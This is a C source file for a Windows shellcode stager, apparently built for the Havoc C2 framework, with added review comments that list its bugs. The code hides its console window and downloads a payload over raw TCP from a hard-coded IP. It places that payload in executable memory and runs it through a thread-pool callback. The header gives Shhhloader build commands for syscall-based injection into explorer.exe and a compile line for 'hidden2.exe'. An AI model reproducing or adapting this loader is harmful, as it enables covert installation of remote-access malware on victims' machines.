/*
** p4p1: http://p4p1.github.io/
** Created on: Wed 02 Aug 2023 01:37:50 PM CEST
** stager.c
** Description:
** A C stager for havoc.
** Build and packaging commands (note: the compile line below names net_stager.c, which does not match this file's name, stager.c):
** ./Shhhloader.py -p explorer.exe -ns -sc SysWhispers3 -m QueueUserAPC ../demon.x64.bin
** ./Shhhloader.py -v -p explorer.exe -ns -sc SysWhispers3 -m QueueUserAPC ../demon.x64.bin
** x86_64-w64-mingw32-gcc net_stager.c -o hidden2.exe -lws2_32
*/
#include <ws2tcpip.h>
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32.lib")
#define IP_ADDR "192.168.1.104"
#define PORT 1234
#ifdef _32_BIT_
#define demon_x64_bin_len 89088
#else
#define demon_x64_bin_len 97279
#endif
unsigned char data[demon_x64_bin_len];
/*
** Connect to IP_ADDR:PORT over plain TCP and read the payload into the
** global `data` buffer.
**
** Returns 1 on success, 2 on any failure (WSAStartup, socket, connect or
** recv). main() retries while the result is 2, so a persistent failure
** (peer down, port closed) turns into a tight reconnect loop with no delay.
**
** Security note: the bytes read here are later executed (see main()). The
** connection is unauthenticated and unencrypted, and the peer is a
** hard-coded IP, so whoever answers on that address -- or can redirect or
** tamper with the traffic -- controls what this process runs. There is no
** length, hash or signature check on the received data.
*/
int retrieve_stager()
{
WSADATA wsa;
SOCKET s;
/* Not zero-initialised: sin_zero is left indeterminate. Only sin_addr,
** sin_family and sin_port are set below. */
struct sockaddr_in cleanServer;
int response_size = 0;
if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
return 2;
/* No WSACleanup() on any path in this file; each retry calls WSAStartup again. */
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
return 2;
/* Return value of InetPtonA is not checked; a malformed IP_ADDR would
** leave sin_addr unset and the connect below would target garbage. */
InetPtonA(AF_INET, IP_ADDR, &cleanServer.sin_addr.s_addr);
cleanServer.sin_family = AF_INET;
cleanServer.sin_port = htons(PORT);
/* On failure the socket `s` is leaked (closesocket only runs on success). */
if (connect(s, (struct sockaddr*)&cleanServer, sizeof(cleanServer)) < 0)
return 2;
/* Single recv(): TCP may deliver fewer than demon_x64_bin_len bytes in one
** call. response_size holds the actual count but is never used by this
** function or by main(), which copies sizeof(data) regardless. A short read
** therefore yields a partial payload padded with zero bytes. Socket leaked
** on SOCKET_ERROR as well. */
if ((response_size = recv(s, (char*)data, demon_x64_bin_len, 0)) == SOCKET_ERROR)
return 2;
closesocket(s);
return 1;
}
/*
** Entry point. Hides the console window, fetches the payload with
** retrieve_stager() (retrying on failure), copies it into RWX memory and
** runs it as a thread-pool wait callback, then blocks on the event.
**
** Security note: what executes here is whatever arrived on the socket; see
** retrieve_stager() for why that is untrusted. The copy and the callback
** both use the full buffer size, not the number of bytes actually received.
*/
int main(void)
{
/* alloc, oldProtect, cr and hProcess are declared but never used. */
PVOID alloc;
DWORD oldProtect = 0;
HANDLE cr;
HANDLE hProcess;
int ret_val = 2;
HWND stealth;
/* Create a console, look up its window and hide it (0 == SW_HIDE).
** `stealth` is not NULL-checked before ShowWindow. */
AllocConsole();
stealth=FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(stealth, 0);
/* retrieve_stager() returns 2 on any failure; this spins with no backoff
** until a connection succeeds and recv() does not error. */
while (ret_val == 2) // constantly download stager on error;
ret_val = retrieve_stager();
/* Auto-reset event (bManualReset = FALSE) that starts signalled
** (bInitialState = TRUE), so the wait registered below fires immediately. */
HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);
/* Writable+executable mapping of the whole buffer. NULL return is not
** checked; RtlMoveMemory would then write to address 0. */
LPVOID scodeAddress = VirtualAlloc(NULL, sizeof(data), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
/* Copies sizeof(data) bytes, i.e. the compile-time length, regardless of how
** many bytes recv() actually returned. */
RtlMoveMemory(scodeAddress, data, sizeof(data));
/* The buffer itself is used as the wait callback; returned PTP_WAIT is not
** NULL-checked before SetThreadpoolWait. */
PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)scodeAddress, NULL, NULL);
SetThreadpoolWait(threadPoolWait, event, NULL);
/* NOTE(review): presumably the thread-pool wait consumes the auto-reset
** signal, so this blocks indefinitely and keeps the process alive while the
** callback runs -- confirm; if the signal is still set here, main returns
** and the process may exit before the callback completes. */
WaitForSingleObject(event, INFINITE);
return 0;
}